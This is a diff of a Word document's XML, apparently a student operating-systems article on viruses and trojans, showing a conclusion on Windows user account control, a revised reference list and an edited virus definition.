+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">This simulation also demonstrated the possible exploitation due to easily exposed methods found in hidden libraries in the operating system. </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -1385,12 +5638,22 @@
         </w:rPr>
         <w:t>_____________________________________________________________________________________</w:t>
       </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>4 CONCLUSIONS</w:t>
       </w:r>
     </w:p>
@@ -1399,6 +5662,97 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>In conclusion of this experiment</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>it is evident th</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at, although most actions in the system within the frame of reference require administrative level authorization, there should be a stricter </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">implementation of the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>user account control</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">system </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>present in Microsoft Windows as in some scenarios in where execution of a specific command should have been blocked it was still process and executed by the O.S. with no doubt in the executing authority.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>On the other hand, although it is good that OEMs allow programmers to make use of methods found in their libraries, especially some methods used by the kernel to interpret input from external devices, it is also evident that the act of allowing access to such methods could easily lead to attacks and misuse as exposing these methods allow the said programmer full control of them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1409,7 +5763,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>_____________________________________________________________________________________REFERENCES</w:t>
+        <w:t>____________________________________________________________________________________REFERENCES</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1422,7 +5776,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[1] Vangie Beal. 2015. The Difference Between a Computer Virus, Worm and Trojan Horse. (December 2015). Retrieved March 1, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId6">
+      <w:hyperlink r:id="rId18">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1440,23 +5794,9 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">[2] </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Aravsons</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. 2018. Trojan horse (computing). (February 2018). Retrieved March 1, 2018 from </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId7">
+        <w:t xml:space="preserve">[2] Aravsons. 2018. Trojan horse (computing). (February 2018). Retrieved March 1, 2018 f </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId19">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1482,7 +5822,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[3] Alan Tay. 2012. </w:t>
       </w:r>
-      <w:hyperlink r:id="rId8">
+      <w:hyperlink r:id="rId20">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1497,7 +5837,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. (January 2012). Retrieved March 1, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId9">
+      <w:hyperlink r:id="rId21">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1524,21 +5864,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">[4] Z.HU </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Zhenfang</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. 2015. Study on Computer Trojan Horse Virus and Its Prevention. </w:t>
+        <w:t xml:space="preserve">[4] Z.HU Zhenfang. 2015. Study on Computer Trojan Horse Virus and Its Prevention. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1572,23 +5898,9 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">Babar Bashir </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Chohan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. 2017. Transmission Control Protocol. (November 2017). Retrieved March 2, 2018 from </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
+        <w:t xml:space="preserve">Babar Bashir Chohan. 2017. Transmission Control Protocol. (November 2017). Retrieved March 2, 2018 from </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId22" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1615,6 +5927,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">[6] </w:t>
       </w:r>
       <w:r>
@@ -1623,7 +5936,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Esmond Pitt. 2017. User Datagram Protocol. (April 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId11" w:history="1">
+      <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1652,23 +5965,10 @@
       <w:r>
         <w:t xml:space="preserve">[7] </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ForensicsWiki</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. 2015. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. (March 2015). Retrieved March 1, 2018 from </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
+      <w:r>
+        <w:t xml:space="preserve">ForensicsWiki. 2015. Netcat. (March 2015). Retrieved March 1, 2018 from </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId24" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1690,7 +5990,7 @@
       <w:r>
         <w:t xml:space="preserve">Guy Harris. 2017. Command-line interface. (November 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId13" w:history="1">
+      <w:hyperlink r:id="rId25" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1701,10 +6001,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p/>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
@@ -1713,6 +6010,56 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
@@ -1920,11 +6267,127 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="718D0C2B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="863E5C82"/>
+    <w:lvl w:ilvl="0" w:tplc="0AAEFBA4">
+      <w:start w:val="8"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -2052,6 +6515,7 @@
     <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -2095,8 +6559,10 @@
     <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
     <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -2327,6 +6793,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -2382,6 +6849,50 @@
       <w:color w:val="808080"/>
       <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Header">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HeaderChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AB7016"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
+    <w:name w:val="Header Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Header"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00AB7016"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Footer">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="FooterChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AB7016"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+    <w:name w:val="Footer Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Footer"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00AB7016"/>
   </w:style>
 </w:styles>
 </file>
@@ -2652,7 +7163,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{278ED954-B11A-42B3-80B8-C0A855D08E50}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B8F2C240-6701-4FB9-AA33-00579A401CB9}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/OSproject_r1/IT154_Project_Article.docx
+++ b/OSproject_r1/IT154_Project_Article.docx
@@ -289,7 +289,55 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">A computer virus is defined as a computer program with malicious intent. It is known to attach itself to other computer programs enabling it to spread from one machine to another. These said mischievous programs can range in severity; while some may only introduce mildly annoying effects, others can damage more than software related components like hardware. Almost all viruses come along with executable files (files with a .exe extension) which means they could exist in the victim’s filesystem. But, will not be of any harm unless the executable is executed. According to [1], it is important to note that a virus would neither spread nor infect one’s machine without user intervention (such as running the infected program). [1] explains that as a virus is spread by human action, people will continue to unintentionally spread them by sharing infecting files or sending e-mails in where the viruses can come along as attachments.  </w:t>
+        <w:t>A computer virus is defined as a computer program with malicious intent. It is known to attach itself to other computer programs enabling it to spread from one machine to another. These said mischievous programs can range in severity; while some may only introduce mildly annoying effects, others can damage more than software</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>related components like hardware. Almost all viruses come along with executable files (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">such as </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
